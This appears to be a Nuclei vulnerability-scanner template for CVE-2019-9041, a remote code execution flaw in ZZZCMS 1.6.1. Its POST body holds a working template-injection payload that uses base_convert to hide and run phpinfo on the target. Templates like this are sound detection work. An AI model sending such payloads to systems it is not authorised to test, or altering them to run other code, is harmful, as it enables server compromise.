29 lines
597 B
YAML
29 lines
597 B
YAML
|
id: CVE-2019-9041
|
||
|
|
||
|
info:
|
||
|
name: ZZZCMS 1.6.1 RCE
|
||
|
author: pikpikcu
|
||
|
severity: high
|
||
|
reference: https://nvd.nist.gov/vuln/detail/CVE-2019-9041
|
||
|
tags: cve,cve2019,zzzcms,rce
|
||
|
|
||
|
requests:
|
||
|
- method: POST
|
||
|
path:
|
||
|
- "{{BaseURL}}/search/"
|
||
|
headers:
|
||
|
Content-Type: application/x-www-form-urlencoded
|
||
|
body: |
|
||
|
keys={if:array_map(base_convert(27440799224,10,32),array(1))}{end if}
|
||
|
|
||
|
matchers-condition: and
|
||
|
matchers:
|
||
|
- type: word
|
||
|
words:
|
||
|
- "phpinfo"
|
||
|
- "PHP Version"
|
||
|
part: body
|
||
|
- type: status
|
||
|
status:
|
||
|
- 200
|